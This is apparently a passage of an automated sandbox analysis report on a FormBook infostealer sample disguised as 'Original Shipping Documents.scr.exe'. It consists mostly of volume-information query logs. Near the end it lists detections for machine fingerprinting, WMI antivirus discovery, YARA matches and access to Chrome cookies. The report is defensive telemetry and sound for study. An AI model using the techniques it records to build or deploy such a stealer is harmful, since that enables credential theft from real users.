Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Queries volume information: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 8.2.Original Shipping Documents.scr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Original Shipping Documents.scr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1742172690.0000000001960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3848860460.0000000000190000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3849067022.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3852328512.00000000051E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3849139713.0000000000680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1741455772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3850140955.00000000032D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1744390860.0000000002930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\SecEdit.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
